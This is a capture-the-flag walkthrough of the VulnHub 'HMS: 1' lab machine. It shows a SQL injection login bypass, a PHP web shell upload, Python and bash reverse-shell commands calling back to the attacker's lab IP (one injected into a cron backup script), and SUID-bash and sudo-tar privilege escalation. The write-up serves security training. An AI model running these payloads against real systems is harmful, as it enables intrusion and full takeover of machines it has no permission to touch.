Capture the flag (CTF)

HMS: 1 VulnHub CTF Walkthrough

In this article, we will solve an easy capture-the-flag challenge posted on the Vulnhub platform.

You should have some knowledge of Linux commands and run some basic pentesting tools to solve this capture the flag (CTF). 

The torrent downloadable URL is available for this VM; it has been added in the reference section of this article.

https://download.vulnhub.com/hms/niveK.ova

Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The steps

1. Getting the IP address with the fping utility
2. Port scanning through Nmap
3. Identifying vulnerability in running web application
4. Exploiting SQL injection vulnerability through SQLMap
5. Exploiting file upload vulnerability and getting the user flag 
6. Escalating the user privileges and getting the root flag

So, now that we have all the information we need let's get started with the challenge. 

The walkthrough

Step 1

The first step to solving any CTF is to identify the target machine's IP address. Since we are running a virtual machine in the same network, we can identify the target machine's IP address by checking all the available IP addresses connected to our network. [CLICK IMAGES TO ENLARGE]

Command used: << fping -aqg 192.168.1.0/24 >>

As can be seen in the above screenshot, for this CTF, we used the fping command to identify all the live IP addresses on my local network. We checked each IP Address one by one and found that our target machine is running on 192.168.1.22, and that we would be using 192.168.1.25 as an attacker machine to solve this machine.

Step 2

After getting the target machine's IP address, the next step is to find out the open ports and services available on the machine. We will use the Nmap tool for it, as it works effectively and is by default available on Kali Linux. The results can be seen below:

Command used: << nmap -sV -p- 192.168.1.22 >>

In the Nmap command, we used the '-sV' switch for version enumeration. We also used the '-p-' option for a full port scan. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. By default, Nmap conducts the scan only on known 1024 ports. So, it is especially important to conduct a full port scan during the pentest or solve the CTF for maximum results.

The Nmap output shows that three ports have been identified as open. Port 22 is being used for SSH, port 21 is being used for running the FTP service and port 7080 is being used for HTTP.

Step 3

We'll start enumerating the target machine by exploring the HTTP port 7080. We opened the target machine IP address on the browser. We found a login page on the target application, which can be seen below.

We tried our luck with some default usernames and passwords, but that did not work. We started testing the application for SQL Injection. During testing, we added a single quote in the email box, which gives an SQL error as follows:

From the above error message, we know that the application is vulnerable to SQL injection. In the next step, we will use SQLMap to exploit the vulnerability.

Step 4

SQLMAP is one of the best open-source tools to exploit SQL Injection vulnerability, and it is installed in Kali Linux by default. We copied the login post request from Burp Suite and pasted it into a note file on our attacker machine, seen below.

Command used: << cat >> request >>

The vulnerable parameter in the post request is 'email,' so we put an asterisk (*) so that SQLMAP can identify the parameter we want to exploit for SQL injection. Let's run SQLMAP on the saved request. The command used for the purpose can be seen below.

Command used: << sqlmap -r request >>

SQLMap confirms that it is vulnerable to SQL Injection. Let's download the user table where we can find some credentials. We downloaded the database, but the password was stored in a hashed format. We tried to crack the password using various methods, but all efforts were in vain.

We know that the email id parameter is vulnerable to SQL injection. We tried authentication bypass for the login page. We bypassed the login page by putting the 'OR 1=1 -- payload as the email id input. As the application depends on client-side validation, we set up the burp proxy and intercepted the request and changed the payload as given below:

We checked all the application functionality but didn't get anything. We ran the burp Spider on this application, which created the sitemap and showed all the files in the sitemap. The sitemap can be seen below:

We started checking and analyzing each file one by one from there. After some time, we finally got an interesting file named 'setting.php.' We opened the file into the browser and found file upload functionality in the settings.

The highlighted area shows the file upload functionality.

In the next step, we will try to exploit the file upload functionality.

Step 5

We can use this functionality to upload a shell on the target machine, but before that, we need to identify the path from where the uploaded files could be accessed. We uploaded a test image to identify the path, and it got uploaded on the same page, as can be seen in the following screenshot.  

We right-clicked on the image file and copied the URL to open it into another tab. The uploaded image could be seen, and we also found that directory listing was enabled on the upload folder. This can be seen in the screenshot that follows.

We have all the required information to upload a shell file through the file upload functionality. For this, we captured the file upload request and sent it into a burp repeater. We added the PHP command execution code in the request, as shown highlighted in the screenshot below.

In response to the request, we can see that the shell has been successfully uploaded. The path of the shell is also visible in the response. So, let's test the shell by running the 'ls' command.   

As we can see above, the shell is successfully uploaded, and the result of the ls command confirms that we can execute commands on the target machine. Let's use this to gain remote access to the target machine. We can do this with the help of a python payload. We created a python payload on our attacker machine to get the reverse shell. The payload can be seen below for reference.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We configured netcat on our attacker machine to listen to incoming connections through port 1234. Let's now run the payload on the attacker's machine by pasting it into the shell.

Command used: << nc -lvp 1234 >>

view-source:http://192.168.1.22:7080/uploadImage/Logo/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.25%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

The payload worked as we got the reverse proxy connection through netcat on our attacker machine. This was a limited shell, so we used another command to get a stable shell.

Command used: << python3 -c 'import pty;pty.spawn("/bin/bash")' >>

We can now access the target machine as user ‘daemon.’ We’ll now explore the target machine to identify further weaknesses in the system.

Command used: << cat local.txt >>

After logging in, we checked the current directory contents and found the first flag. The flag file was named 'local.txt' and can be seen reading in the above screenshot.

Step 6

Until now, we have had user access on the target machine. Let's run some commands to know more about the operating system as follows:

Command used:

<< cat /etc/issue >>

<< uname -a >>

At first, we enumerated the target machine operating system and kernel information. We researched the web for an available exploit for the identified versions. We tried a local exploit, but it wasn't useful in our case.

Command used:

• << find / -prem -4000 -type f -exec ls -al {} \; 2>/dev/null >>
• << /usr/bin/bash -p >>

We checked the SUID binaries and found that '/bin/bash/ is also a SUID binary that can be exploited to gain user access to the target machine. The binary is owned by user eren. We can get access to the bash shell and control it as user eren. We escalated the user privilege by running the SUID binary. After that, we confirmed the user privilege by running the 'whoami' command. It confirms that though we are still logged in as user daemon, we have eren user privilege for bash.

Command used: << cat /etc/crontab >>

While exploring the target machine further, we found a cron job that was running a backup script. The path of the backup script can be seen above. The cron was configured to be run every five minutes. We can use this to escalate user privilege to root.

The backup.sh file could be updated by user eren as we have the user bash privilege. We used the echo command to update the backup.sh file with another reverse proxy payload. Also, on our attacker machine, we configured netcat to listen to incoming connections through port 3434. 

Command used:

<< echo "bash -i >& /dev/tcp/192.168.1.25/3434 0>&1" >> backup.sh >>

<< nc -lvp 3434 >>

As the cron was executed every five minutes, we waited for a while and finally got the reverse connection on our attacker machine.

Command used: << sudo -l >>

We are now logged into the target machine as user eren. We used the above command to check the sudo permissions of this user. We found that '/bin/tar' can be run as root.

Command used:

<< sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash >>

We now have root access to the target machine. This was confirmed by running the id command. However, this is a limited shell, so we need a stable shell to read files.

Command used: << python -c 'import pty;pty.spawn("/bin/bash")' >>

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

We used the above command to convert it into a stable shell. After that, we found the root flag in the root directory. The flag file can be seen above, which completes the challenge.

We have read two flags and gained root access to the target machine. I hope you enjoyed this exercise.

 

Sources

• HMS, VulnHub

• HMS, VulnHub
• HMS, VulnHub